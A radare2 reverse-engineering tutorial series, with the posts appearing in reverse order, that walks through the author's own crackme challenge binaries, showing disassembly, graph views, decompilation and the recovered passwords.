After some stack setup between addresses 0x400720 and 0x400729, some function is called at 0x400744 with the main function as the first parameter (mov rdi, sym.main) besides some other parameters. As you can see, the call uses program counter (RIP) relative addressing. This technique is typically used to produce position independent code (PIC), which is needed for the ASLR technique. As rip points to the next instruction to be executed, it will contain the address 0x40074a. This results in the address 0x600ff0 (to calculate in radare2: ? 0x40074a+0x2008a6).
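
The same calculation can be done by hand from the instruction bytes ff15a6082000. The sketch below is a hypothetical helper, not part of radare2, and it only handles this one 6-byte encoding (two opcode bytes followed by a little-endian 32-bit displacement).

```c
#include <stdint.h>

/* Computes the memory operand address of a 6-byte
 * `call qword [rip + disp32]` located at insn_addr. */
static uint64_t rip_relative_target(uint64_t insn_addr, const uint8_t insn[6]) {
    /* disp32 is stored little-endian in bytes 2..5 */
    uint32_t raw = (uint32_t)insn[2]
                 | (uint32_t)insn[3] << 8
                 | (uint32_t)insn[4] << 16
                 | (uint32_t)insn[5] << 24;
    int32_t disp = (int32_t)raw;          /* the displacement is signed */
    uint64_t next = insn_addr + 6;        /* rip points past this instruction */
    return next + (uint64_t)(int64_t)disp;
}
```

For the call at 0x400744, the displacement bytes a6 08 20 00 decode to 0x2008a6 and the next instruction is at 0x40074a, so the function returns 0x600ff0.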

If we look into the sections of the binary (iS), we’ll see that this address belongs to the .got section. This section contains the global offset table (GOT) and is filled by the dynamic linker at load time. It’s used as a jump table for library functions. Radare2 is also able to parse the relocation tables to tell us which functions will be mapped at runtime (ir command):


vaddr=0x00600ff0 paddr=0x00000ff0 type=SET_64 __libc_start_main
vaddr=0x00600ff8 paddr=0x00000ff8 type=SET_64 __gmon_start__
vaddr=0x00601018 paddr=0x00001018 type=SET_64 puts
vaddr=0x00601020 paddr=0x00001020 type=SET_64 strlen
vaddr=0x00601028 paddr=0x00001028 type=SET_64 printf
vaddr=0x00601030 paddr=0x00001030 type=SET_64 __isoc99_scanf

6 relocations

Therefore, the __libc_start_main function will be called at runtime :)… Some of you may have already noticed that radare is smart enough to provide this information to us in the comment at the call line ;).

Radare is also able to replace the RIP-relative operand with the name of the target. To get this, you have to enable the asm.relsub option:

call qword [reloc.__libc_start_main_240] ; [0x600ff0:8]=0 LEA reloc.__libc_start_main_240 ; reloc.__libc_start_main_240


As the __libc_start_main function is a standard library function provided by the Linux C library (libc), we’ll jump directly into the main function (s sym.main).

This time, we’ll try to get a fast overview of the referenced flags in this function (strings, global variables, functions, etc.). To get a graph of the references, we have two options. The first one is to generate a graphviz graph by using agc $$ | xdot - ($$ is a variable containing the current address, sym.main in this case):

Reference Graph

The other option would be the ascii graph in the visual mode (we’ll come to this later) which you’ll get by executing VV and then pressing >. As this looks very similar to the last challenge, we could directly look into the checkPassword function. You can do this either by seeking to it (s sym.checkPassword) or in the visual graph view by pressing the tab key until the function is marked. After pressing q, you’ll be placed inside the function (press q multiple times if you want to return to the main interface).


As we want to take a look into some of the visual modes of radare2, we’ll stay in the graph mode this time (either by pressing q only once or by entering VV).

[0x0040084f]> VV @ sym.checkPassword (nodes 9 edges 11 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
                                  |  0x40084f                                   |
                                  | (fcn) sym.checkPassword 148                 |
                                  | ; var int local_28h @ rbp-0x28              |
                                  | ; var int local_1ch @ rbp-0x1c              |
                                  | ; var int local_18h @ rbp-0x18              |
                                  | ; var int local_14h @ rbp-0x14              |
                                  | ; var int local_10h @ rbp-0x10              |
                                  | ; var int local_4h @ rbp-0x4                |
                                  | push rbp                                    |
                                  | mov rbp, rsp                                |
                                  | sub rsp, 0x30                               |
                                  | mov qword [rbp - local_28h], rdi            |
                                  | mov qword [rbp - local_10h], str.Sup3rP4ss  |
                                  | mov rax, qword [rbp - local_10h]            |
                                  | mov rdi, rax                                |
                                  | call sym.imp.strlen ;[a]                    |
                                  | mov dword [rbp - local_14h], eax            |
                                  | mov rax, qword [rbp - local_28h]            |
                                  | mov rdi, rax                                |
                                  | call sym.imp.strlen ;[a]                    |
                                  | mov dword [rbp - local_18h], eax            |
                                  | mov eax, dword [rbp - local_14h]            |
                                  | cmp eax, dword [rbp - local_18h]            |
                                  | je 0x400890 ;[b]                            |
                                        t f
                           .------------' '------------------------------.
                           |                                             |
                           |                                             |
                     =-----------------------------------=       =--------------------=
                     |  0x400890                         |       |  0x400889          |
                     | mov eax, dword [rbp - local_14h]  |       | mov eax, 0         |
                     | mov dword [rbp - local_1ch], eax  |       | jmp 0x4008e1 ;[f]  |
                     | mov dword [rbp - local_4h], 0     |       =--------------------=
                     | jmp 0x4008d4 ;[c]                 |           v
                     =-----------------------------------=           |
                         v                                           '------.
                         |                                                  |
                         |                                                  |
                         .----------------.                                 |
                     =-----------------------------------=                  |
                     |  0x4008d4          |              |                  |
                     | mov eax, dword [rbp - local_4h]   |                  |
                     | cmp eax, dword [rbp - local_1ch]  |                  |
                     | jl 0x40089f ;[d]   |              |                  |
                     =-----------------------------------=                  |
                           t f            |                                 |
      .--------------------' '------------|-------------.                   |
      |                                   |             |                   |
      |                                   |             |                   |
=-----------------------------------=     |     =--------------------=      |
|  0x40089f                         |     |     |  0x4008dc          |      |
| mov eax, dword [rbp - local_4h]   |     |     | mov eax, 1         |      |
| movsxd rdx, eax                   |     |     =--------------------=      |
| mov rax, qword [rbp - local_28h]  |     |         v                       |
| add rax, rdx                      |     |         |                       |
| movzx edx, byte [rax]             |     |         |                       |
| mov eax, dword [rbp - local_1ch]  |     |         |                       |
| sub eax, 1                        |     |         |                       |
| sub eax, dword [rbp - local_4h]   |     |         |                       |
| movsxd rcx, eax                   |     |         |                       |
| mov rax, qword [rbp - local_10h]  |     |         |                       |
| add rax, rcx                      |     |         '-----------------.     |
| movzx eax, byte [rax]             |     |                           |     |
| cmp dl, al                        |     |                           |     |
| je 0x4008d0 ;[e]                  |     |                           |     |
=-----------------------------------=     |                           |     |
        f t                               |                           |     |
        '---.-------------------------.   |                           |     |
            |                         |   |                           |     |
            |                         |   |                           |     |
    =--------------------=      =-------------------------------=     |     |
    |  0x4008c9          |      |  0x4008d0                     |     |     |
    | mov eax, 0         |      | add dword [rbp - local_4h], 1 |     |     |
    | jmp 0x4008e1 ;[f]  |      =-------------------------------=     |     |
    =--------------------=          `-----'                           |     |
        v                                                             |     |
                                          |  0x4008e1          |
                                          | leave              |
                                          | ret                |


This graph is available in different views, which can be cycled through by pressing p. The view we’ll focus on this time is the minimap view. You’ll get it by pressing p until you see BB-SMALL in the first line of the output. It should look like this:

[0x0040084f]> VV @ sym.checkPassword (nodes 9 edges 11 zoom 100%) BB-SMALL mouse:canvas-y movements-speed:5                                   

(fcn) sym.checkPassword 148
; var int local_28h @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int local_18h @ rbp-0x18
; var int local_14h @ rbp-0x14
; var int local_10h @ rbp-0x10
; var int local_4h @ rbp-0x4
push rbp
mov rbp, rsp
sub rsp, 0x30
mov qword [rbp - local_28h], rdi
mov qword [rbp - local_10h], str.Sup3rP4ss
mov rax, qword [rbp - local_10h]
mov rdi, rax
call sym.imp.strlen ;[a]                                                <@@@@@@>
mov dword [rbp - local_14h], eax                                           t f
mov rax, qword [rbp - local_28h]                                 .---------' '---------.
mov rdi, rax                                                     |                     |
call sym.imp.strlen ;[a]                                         |                     |
mov dword [rbp - local_18h], eax                              [_0890_]            [_0889_]
mov eax, dword [rbp - local_14h]                               v                   v
cmp eax, dword [rbp - local_18h]                               |                   |
je 0x400890 ;[b]                                               |                   |
                                                               .                   |
                                                              [_08d4_]             |
                                                               | t f               |
                                                       .-------|-' '---------.     |
                                                       |       |             |     |
                                                       |       |             |     |
                                                    [_089f_]   |        [_08dc_]   |
                                                         f t   |         v         |
                                                  .------' '--.|         '---.     |
                                                  |           ||             |     |
                                                  |           ||             |     |
                                             [_08c9_]      [_08d0_]          |     |
                                              v             `--'             |     |

This view shows you a minimap in the center and the currently selected node as a disassembly in the upper left (the current node is marked with @@@@@@). It helps us focus on the smaller blocks of a function while always keeping an overview of the execution flow.

As we are now starting to read the assembly code, I want to show you another nice feature for those of you who don’t speak fluent assembly. Radare2 has an option to replace the assembly code with pseudo code which is simpler to read (but sometimes not as detailed). To enable this feature, press : (colon, to open the main shell) and enter e asm.pseudo = true. After leaving the shell again (press enter) you should see something like this:

(fcn) sym.checkPassword 148
; var int local_28h @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int local_18h @ rbp-0x18
; var int local_14h @ rbp-0x14
; var int local_10h @ rbp-0x10
; var int local_4h @ rbp-0x4
push rbp
rbp = rsp
rsp -= 0x30
qword [rbp - local_28h] = rdi
qword [rbp - local_10h] = str.Sup3rP4ss
rax = qword [rbp - local_10h]
rdi = rax
sym.imp.strlen ()
dword [rbp - local_14h] = eax
rax = qword [rbp - local_28h]
rdi = rax
sym.imp.strlen ()
dword [rbp - local_18h] = eax
eax = dword [rbp - local_14h]
if (eax == dword [rbp - local_18h]
isZero 0x400890)

The first three lines are a typical function prologue. They back up rbp and reserve 48 bytes of memory on the stack. As you may have noticed, radare2 displays constant values in hexadecimal by default. Similar to IDA Pro, we are able to tell radare how we want to see a value at a specific position. Sadly this isn’t easily available in the graph view (yet?), but we can set it manually in the main shell. First we need the address of the opcode containing the value we want to change. We can get it, for example, by using pd 3 (which disassembles 3 opcodes from the current position). This gives us 0x00400853. To tell radare that we want to see the value in decimal, we enter ahi d @ 0x00400853. This stands for analysis hint immediate, decimal, at the address 0x00400853.

As we know from the last challenge, the function checkPassword takes one argument and returns whether it contains the correct password. Currently, radare2 has not detected that the function has an argument. Let’s tell it to do so. The command afvr rdi password const char* tells radare2 that the rdi register is used as an argument with the name password and the type const char* (based on the System V AMD64 ABI). This means that the local variable local_28h is a pointer to the entered password. Therefore we change the name and the type of the variable (afvn local_28h password_1 and afvbt password_1 const char*). The next line indicates that local_10h points to the string we compare with (I rename it to targetPassword). As rdi always carries the first argument in the AMD64 ABI, it gets confusing now that it is aliased to password throughout the function disassembly. That’s why I prefer to remove the alias again once I have followed the data flow (afvr- password).

This means that the next 8 lines calculate the lengths of the two strings and store them in local_14h and local_18h respectively (renamed to targetPwdLength and inputPwdLength below). Your current disassembly should now look close to this:

(fcn) sym.checkPassword 148
; var const char* password_1 @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int inputPwdLength @ rbp-0x18
; var int targetPwdLength @ rbp-0x14
; var const char* targetPassword @ rbp-0x10
; var int local_4h @ rbp-0x4
; UNKNOWN XREF from 0x004004b8 (unk)
; CALL XREF from 0x00400942 (sym.main)
push rbp
rbp = rsp
rsp -= 48
qword [rbp - password_1] = rdi
qword [rbp - targetPassword] = str.Sup3rP4ss
rax = qword [rbp - targetPassword]
rdi = rax
sym.imp.strlen ()
dword [rbp - targetPwdLength] = eax
rax = qword [rbp - password_1]
rdi = rax
sym.imp.strlen ()
dword [rbp - inputPwdLength] = eax
eax = dword [rbp - targetPwdLength]
if (eax == dword [rbp - inputPwdLength]
isZero 0x400890)

If we directly translate what we have so far, we get:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
    }
}

Let’s check what happens if both lengths are not equal (you might already have a strong guess based on the minimap 😉 ). In the graph view you can simply press t or f to follow the true or the false branch. Pressing f brings us to a very small node. This node simply sets eax to zero and then jumps to 0x4008e1. To follow this jump, you can press g and the character(s) shown behind the jump (f in my case). What happened next in my version of radare2 is that I got an empty disassembly in the top left. This is one of the situations where the pseudo syntax misses some instructions. After disabling it (e asm.pseudo = false), you’ll see the instructions leave and ret. They tell the CPU to tear down the current stack frame (restoring the saved rbp) and to jump back to the code which called the current function. In combination with the previous eax line, we have:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
    } else {
        return 0;
    }
}

Current state: 3 blocks decompiled (0x40084f, 0x400889 and 0x4008e1).

Let’s continue with the next one (the true case of the comparison).

Sidenote: You can always navigate through the blocks by using tab and TAB (shift+tab)

This block consists of three instructions which take a copy of the targetPwdLength variable and set another variable to zero. This is a typical loop intro which sets up the counter variable(s). If we take a look at the minimap, we can see that this actually is the intro to a loop (this block jumps to block 0x4008d4, and block 0x4008d0 also jumps back to block 0x4008d4). So let’s rename the variables accordingly: local_1ch becomes length and local_4h becomes counter (another block finished 🙂 ).

The next one is again a small one. It compares the counter variable to the copy of the length. If the counter is lower, it continues with another check (based on the minimap); if not, it goes to a block which ends up in the function epilogue. I’ll go with the latter first as it seems to be a quick one… It stores the value 1 in eax, which means that the function returns true. Our current decompiled code:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
        int counter = 0;
        int length = targetPwdLength;
        while(counter < length) {
        }
        return 1;
    } else {
        return 0;
    }
}

The true block is a larger one with some calculations and one comparison:

eax = dword [rbp - counter]
rdx = eax
rax = qword [rbp - password_1]
rax += rdx
edx = byte [rax]
eax = dword [rbp - length]
eax -= 1
eax -= dword [rbp - counter]
rcx = eax
rax = qword [rbp - targetPassword]
rax += rcx
eax = byte [rax]
if (dl == al
isZero 0x4008d0)


The first five lines load the character of the password_1 array at the position given by the current counter value into edx. The next lines load a character from the targetPassword array into eax, but this time counting from the end. These two values are then compared for equality. Again, let’s check the inequality case first: zero is stored in eax and the function returns false. The true case simply increments the counter by one and starts over at block 0x4008d4.
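To make the index arithmetic of this block concrete, here is a small C sketch that mirrors it one instruction group at a time. The function name block_089f_matches and the register-named locals dl and al are only illustrative; they do not exist in the binary.

```c
/* Illustrative mirror of block 0x40089f; all names are hypothetical.
 * Returns 1 if the block would jump to 0x4008d0 (characters match),
 * 0 if it would fall through to 0x4008c9 (return 0). */
static int block_089f_matches(const char *password_1,
                              const char *targetPassword,
                              int length, int counter)
{
    /* eax = counter; rdx = eax; rax = password_1; rax += rdx; edx = byte [rax] */
    unsigned char dl = (unsigned char)password_1[counter];

    /* eax = length; eax -= 1; eax -= counter; rcx = eax */
    int index_from_end = length - 1 - counter;

    /* rax = targetPassword; rax += rcx; eax = byte [rax] */
    unsigned char al = (unsigned char)targetPassword[index_from_end];

    /* cmp dl, al; je 0x4008d0 */
    return dl == al;
}
```

With length 9 and counter 0, the input character at index 0 is compared against the target character at index 8, which is what "counting from the end" means here.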

We are now able to decompile all blocks of the function:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
        int counter = 0;
        int length = targetPwdLength;
        while(counter < length) {
            if(password_1[counter] == targetPassword[length-1-counter]) {
                counter += 1;
            } else {
                return 0;
            }
        }
        return 1;
    } else {
        return 0;
    }
}

Or after some manual reordering:

int checkPassword(const char* password) {
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password);
    if(targetPwdLength != inputPwdLength) {
        return 0;
    }

    for(int counter = 0; counter < targetPwdLength; counter++) {
        if(password[counter] != targetPassword[targetPwdLength - 1 - counter])
            return 0;
    }
    return 1;
}

Have a clue what this function does?

  1. It checks if the entered password is as long as the required password
  2. It compares the entered password with the reverse of “Sup3rP4ss”

This means our required password is “ss4Pr3puS” :

$ ./challenge02
#          Challenge 2           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: ss4Pr3puS
Password accepted!

That’s it!
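If you don’t trust reversing the string by hand, the password can also be derived programmatically. The following is a minimal sketch, assuming the reordered decompilation above is accurate; reverse_into and check_password are hypothetical names chosen for this example.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: writes the reverse of src into dst.
 * Returns dst, or NULL if dst cannot hold strlen(src) + 1 bytes. */
static char *reverse_into(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size < len + 1)
        return NULL;
    for (size_t i = 0; i < len; i++)
        dst[i] = src[len - 1 - i];
    dst[len] = '\0';
    return dst;
}

/* Same logic as the reordered decompilation of sym.checkPassword. */
static int check_password(const char *password)
{
    const char *targetPassword = "Sup3rP4ss";
    int targetPwdLength = (int)strlen(targetPassword);
    int inputPwdLength = (int)strlen(password);
    if (targetPwdLength != inputPwdLength)
        return 0;

    for (int counter = 0; counter < targetPwdLength; counter++) {
        if (password[counter] != targetPassword[targetPwdLength - 1 - counter])
            return 0;
    }
    return 1;
}
```

Reversing “Sup3rP4ss” into a buffer and passing that buffer to check_password should be accepted, while the unreversed string should be rejected.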

The last command I would like to show you today is the experimental pseudo code feature:

[0x004008d0]> pdc
function sym.checkPassword () {

  ; UNKNOWN XREF from 0x004004b8 (unk)
  ; CALL XREF from 0x00400942 (sym.main)
  push rbp
  rbp = rsp
  rsp -= 0x30
  qword [rbp - password_1] = password
  qword [rbp - targetPassword] = 0x400a93
  rax = qword [rbp - targetPassword]
  password = rax
  0x4006f0 ()                    ; sym.imp.strlen
  dword [rbp - targetPwdLength] = eax
  rax = qword [rbp - password_1]
  password = rax
  0x4006f0 ()                    ; sym.imp.strlen
  dword [rbp - inputPwdLength] = eax
  eax = dword [rbp - targetPwdLength]
  if (eax == dword [rbp - inputPwdLength]
  isZero 0x400890) {

      eax = dword [rbp - targetPwdLength]
      dword [rbp - length] = eax
      dword [rbp - counter] = 0
      goto 0x4008d4
       do {

          ; JMP XREF from 0x0040089d (sym.checkPassword)
          eax = dword [rbp - counter]
          if (eax == dword [rbp - length]
          jl 0x40089f 
           } while (?);
       } while (?);

It’s currently very incomplete in terms of instruction coverage, but it shows where radare2’s features might go in the future (there was a GSoC project which started to create a radare2-based decompiler named radeco).

Challenge 0x03

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge03) = 748f98ced3ca0b9178f8d85cdcc9d750
MD5 (challenge03.exe) = 2a1dde4f0de546216779394ce8960aa5
MD5 (challenge03-static) = 8c48ac034d6cefe135e9f22d6431e930
SHA1 (challenge03) = 0a2317bfb952f64dcd8ca50d2a084275cf8e7816
SHA1 (challenge03.exe) = 1c00a49d1c2249cb528a06c08cce1d15b062f59c
SHA1 (challenge03-static) = 78fcffdbe56d1cea29723df30dc14dfe6baf101f
SHA256 (challenge03) = 00f7662f22a3d305575a0117ea17b8d7801c133ffa2201986d62ebade65bdbf7
SHA256 (challenge03.exe) = 0c4a760a4a8653c4a26d07e0970a3ef7474cbdb53596166a670f5c08453eb57e
SHA256 (challenge03-static) = cbea4018b2451e84b789bd909f892f77486e8d42aee659e175da942a555c97ae

The goal is again to find the correct password for the login into the binary. Next time, I’ll give you a walkthrough for the third challenge and challenge #4.

Happy reversing!

Reverse Engineering With Radare2 – Part 1

Welcome back to the radare2 reversing tutorials. If you’ve missed the intro, you can find it here.

Last time you got the challenge01 binary and your goal was to find the password for the login. Let’s see what the application looks like:

$ ./challenge01
#          Challenge 1           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: test

The first and simplest step is to look for strings inside the binary. We could do this either with the unix utility strings or with rabin2, radare’s tool for analyzing binaries:

$ rabin2 -z ./challenge01
vaddr=0x00400a68 paddr=0x00000a68 ordinal=000 sz=35 len=34 section=.rodata type=ascii string=##################################
vaddr=0x00400a90 paddr=0x00000a90 ordinal=001 sz=35 len=34 section=.rodata type=ascii string=#          Challenge 1           #
vaddr=0x00400ab8 paddr=0x00000ab8 ordinal=002 sz=35 len=34 section=.rodata type=ascii string=#                                #
vaddr=0x00400ae0 paddr=0x00000ae0 ordinal=003 sz=35 len=34 section=.rodata type=ascii string=#      (c) 2016 Timo Schmid      #
vaddr=0x00400b03 paddr=0x00000b03 ordinal=004 sz=9 len=8 section=.rodata type=ascii string=p4ssw0rd
vaddr=0x00400b0c paddr=0x00000b0c ordinal=005 sz=11 len=10 section=.rodata type=ascii string=n0p4ssw0rd
vaddr=0x00400b17 paddr=0x00000b17 ordinal=006 sz=17 len=16 section=.rodata type=ascii string=Enter Password: 
vaddr=0x00400b28 paddr=0x00000b28 ordinal=007 sz=6 len=5 section=.rodata type=ascii string=%255s
vaddr=0x00400b2e paddr=0x00000b2e ordinal=008 sz=19 len=18 section=.rodata type=ascii string=Password accepted!
vaddr=0x00400b41 paddr=0x00000b41 ordinal=009 sz=7 len=6 section=.rodata type=ascii string=Wrong!

Two strings look interesting: “p4ssw0rd” and “n0p4ssw0rd”. Obviously, we could try both of them if one works, but as this is a reversing tutorial, we’ll figure it out in more depth 😉
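To give an idea of what such a string search does, here is a rough C sketch that looks for runs of printable ASCII bytes in a buffer. It is not how strings or rabin2 are implemented (rabin2 also knows about sections and encodings); next_string and its parameters are hypothetical names for this illustration.

```c
#include <stddef.h>

/* Finds the next run of at least min_len printable ASCII bytes in
 * buf[start..size). On success returns the offset of the run and stores
 * its length in *out_len; returns size (and length 0) if there is none. */
static size_t next_string(const unsigned char *buf, size_t size,
                          size_t start, size_t min_len, size_t *out_len)
{
    size_t i = start;
    while (i < size) {
        size_t run_start = i;
        /* Advance over printable characters (space up to tilde). */
        while (i < size && buf[i] >= 0x20 && buf[i] <= 0x7e)
            i++;
        size_t run_len = i - run_start;
        if (run_len > 0 && run_len >= min_len) {
            *out_len = run_len;
            return run_start;
        }
        if (i < size)
            i++; /* skip the non-printable byte that ended the run */
    }
    *out_len = 0;
    return size;
}
```

Calling next_string repeatedly, each time starting at the previous offset plus length, walks through all candidate strings of a buffer, much like the list above walks through .rodata.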

So after loading the binary into radare (r2 ./challenge01) and doing some analysis (aaa), we’ll start by looking at the main function of the binary. As radare2 seeks to the entry point, we have to seek to the main function first.


As we can see in the output above, the main function contains several calls. Some of them call (imported) library functions, which are named after the scheme sym.imp.<function name>. As this is an x64 binary on a Linux system, it uses the System V AMD64 ABI calling convention. This means that the first argument is placed in the rdi register, the second in rsi, the third in rdx, the fourth in rcx, the fifth in r8 and the sixth in r9. A stack buffer also seems to be used, as the rsp register is decremented by 0x120, which allocates 288 bytes on the stack. After that, the registers edi, rsi and rdx are stored on the stack (maybe as a backup). After the call to the banner function, a pointer to the string “Enter Password: ” is stored in edi, which makes it the first argument for the next function call (printf in this case). The next call (scanf) takes the arguments “%255s” and a pointer to the stack. Based on the information shown by radare, the pointer points at rbp-0x100, which means that it points at a 256 byte buffer in the current stack frame (0x100 = 256, and the last byte is set to zero after the call). Now it becomes interesting, as the pointer to the buffer is passed to the checkPassword function as its first argument. The return value of this function (al) is checked for zero. If it is zero, the jump at 0x4009c0 to the address 0x4009ce is taken and “Wrong!” is printed. Otherwise “Password accepted!” is printed.
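The relationship between the “%255s” format and the 256 byte buffer can be tried out in isolation. The sketch below uses sscanf on a string instead of scanf on stdin so that it is easy to experiment with; read_password is a hypothetical name and not a function of the challenge binary.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the scanf call in main: parses one
 * whitespace-delimited token from input into a 256 byte buffer.
 * "%255s" stores at most 255 characters plus the terminating NUL byte.
 * Returns the stored length, or -1 if no token could be read. */
static int read_password(const char *input, char buffer[256])
{
    if (sscanf(input, "%255s", buffer) != 1)
        return -1;
    return (int)strlen(buffer);
}
```

Feeding it more than 255 non-whitespace characters stores only the first 255, which is why the field width and the buffer size differ by exactly one.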

Let’s take a look at the checkPassword function:


As we can see here, our argument is stored on the stack (at local_18h); after that it is read again to be passed to the strlen function. The result of this function is then used as the third argument to the strncmp function. The first argument is our input string and the second argument is …. “n0p4ssw0rd”. This means that the password we are looking for is “n0p4ssw0rd” 🙂 :

$ ./challenge01
#          Challenge 1           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: n0p4ssw0rd
Password accepted!

Challenge solved!
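Translated back to C, the function described above could look roughly like the following sketch. It assumes that the strlen result really is the length of the input and that it is passed unchanged to strncmp; check_password_sketch is a hypothetical name.

```c
#include <string.h>

/* Sketch of challenge01's checkPassword as described in the text
 * (assumption: the input length is used as strncmp's third argument). */
static int check_password_sketch(const char *password)
{
    size_t n = strlen(password);                      /* call sym.imp.strlen  */
    return strncmp(password, "n0p4ssw0rd", n) == 0;   /* call sym.imp.strncmp */
}
```

One consequence of this reading: because the comparison length comes from the input, a prefix such as “n0p” also compares equal in the sketch. Whether the real binary behaves the same way depends on the disassembly matching the assumption above.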

Challenge 0x02

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge02) = 2b26165a67274fca1d23959675114444
MD5 (challenge02.exe) = 5bc1f2451d62ff33b2128185a32cdc9b
MD5 (challenge02-static) = 34ab5bb11a095383c121aecbb689767a
SHA1 (challenge02) = 34c8bb9de8f1c78dbe45edc80c7cedbc176b38a9
SHA1 (challenge02.exe) = 07522e7e3c6444bd3dfae1061d442551b23c6ae6
SHA1 (challenge02-static) = 99d0eac08903ff3d7404d4edb3ea7e6ae524b9d6
SHA256 (challenge02) = 3b743b588e21bb0623a45a39ae34f388d1cf292a96489cfe39a590e769ee6750
SHA256 (challenge02.exe) = f8eeee8c16a121d42915a69a64c3cd32d70b233d512587dc9534db7f7fea0a14
SHA256 (challenge02-static) = 5df7c7aa6bbddf141e0127070e170a3650c45a2586d4bb85250633f0264b9f39

The goal is again to find the correct password for the login into the binary. Next time I’ll give you a walkthrough for the second challenge and challenge #3.

Happy reversing!

Reverse Engineering With Radare2 – Intro

As some of you may know, there is a “new” reverse engineering toolkit out there which tries to compete with IDA Pro in terms of reverse engineering. I’m talking about radare2, a framework for reversing, patching, debugging and exploiting.

It has extensive scripting capabilities, runs on all major platforms (Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS and even on your pebble smartwatch 😉 ) and is free.

Sadly, I had some problems finding good tutorials on how to use it, as the interface is currently a bit cumbersome. After fiddling around, I’ve decided to create a little tutorial series where we can learn together ;).

I will publish one binary per post and you will have time to reverse it till the next blog post is published (most of the time you have to find which data you have to enter to make the binary happy).

So let’s start 🙂


The most advisable way is to use the most current version from the github repository:


(As taken from the README:)

The easiest way to install radare2 from git is by running the following command:

$ sys/install.sh

If you want to install radare2 in the home directory without using root privileges and sudo, simply run:

$ sys/user.sh


If everything goes well, you’ll find multiple tools in your path:

  • r2 – the “main” binary
  • rabin2 – binary to analyze files (list imports, exports, strings, …)
  • rax2 – binary to convert between data formats
  • radiff2 – binary to do some diffing
  • rahash2 – creates hashes from file blocks (and whole file)
  • rasm2 – helps to play with assembler instructions

The default interface for radare2 is the command line. Just type

r2 your_binary

to start it. Radare has a very terse command syntax (it is always logical, but in my opinion a few more characters wouldn’t hurt). So to start the analysis of your file, type aa (for analyze all; use aaa or aaaa to run even more analysis algorithms). Did you already get the idea behind the commands? Radare names its commands in a tree-like structure, so all commands which have to do with analyzing something start with a. If you want to print something you have to use…. p. For example, to disassemble the current function: pdf (print disassembly function).

As no human could remember all available commands in radare (there are many of them), the ? character is used to display context sensitive help text. A single ? shows you which command categories are available and some general help about specifying addresses and data. A p? shows you the help about the different print commands, pd? which commands are available for printing disassemblies of different sources, etc.

An important command to walk through your targets is the seek command. By using

s sym.main

you’ll jump into the main function (as long as you analyzed the binary in the first step and symbols are available). The following shows you the output of the pdf command after seeking to the main function of the /bin/true binary.

            ;-- section_end..plt:
            ;-- section..text:
/ (fcn) main 160
|           ; DATA XREF from 0x0040142d (main)
|           0x00401370      83ff02         cmp edi, 2                  ; [12] va=0x00401370 pa=0x00001370 sz=11465 vsz=11465 rwx=--r-x .text
|       ,=< 0x00401373      7403           je 0x401378                
|       |   0x00401375      31c0           xor eax, eax
|       |   0x00401377      c3             ret
|       `-> 0x00401378      53             push rbx
|           0x00401379      488b3e         mov rdi, qword [rsi]
|           0x0040137c      4889f3         mov rbx, rsi
|           0x0040137f      e84c050000     call fcn.004018d0
|           0x00401384      be6d404000     mov esi, 0x40406d
|           0x00401389      bf06000000     mov edi, 6
|           0x0040138e      e81dffffff     call sym.imp.setlocale
|           0x00401393      bef6404000     mov esi, str._usr_share_locale ; "/usr/share/locale" @ 0x4040f6
|           0x00401398      bfe8404000     mov edi, 0x4040e8           ; "coreutils" @ 0x4040e8
|           0x0040139d      e86efdffff     call sym.imp.bindtextdomain
|           0x004013a2      bfe8404000     mov edi, 0x4040e8           ; "coreutils" @ 0x4040e8
|           0x004013a7      e844fdffff     call sym.imp.textdomain
|           0x004013ac      bf20184000     mov edi, 0x401820
|           0x004013b1      e85a2c0000     call fcn.00404010
|           0x004013b6      488b5b08       mov rbx, qword [rbx + 8]    ; [0x8:8]=0
|           0x004013ba      be08414000     mov esi, str.__help         ; "--help" @ 0x404108
|           0x004013bf      4889df         mov rdi, rbx
|           0x004013c2      e839feffff     call sym.imp.strcmp
|           0x004013c7      85c0           test eax, eax
|       ,=< 0x004013c9      743b           je 0x401406                
|       |   0x004013cb      be0f414000     mov esi, str.__version      ; "--version" @ 0x40410f
|       |   0x004013d0      4889df         mov rdi, rbx
|       |   0x004013d3      e828feffff     call sym.imp.strcmp
|       |   0x004013d8      85c0           test eax, eax
|      ,==< 0x004013da      7526           jne 0x401402               
|      ||   0x004013dc      488b0dcd4d20.  mov rcx, qword [rip + 0x204dcd] ; [0x6061b0:8]=0x404383 str.8.25
|      ||   0x004013e3      488b3d3e4e20.  mov rdi, qword [rip + 0x204e3e] ; [0x606228:8]=0x2029554e4728203a  LEA obj.stdout ; ": (GNU) 5.3.0" @ 0x606228
|      ||   0x004013ea      4531c9         xor r9d, r9d
|      ||   0x004013ed      41b819414000   mov r8d, str.Jim_Meyering   ; "Jim Meyering" @ 0x404119
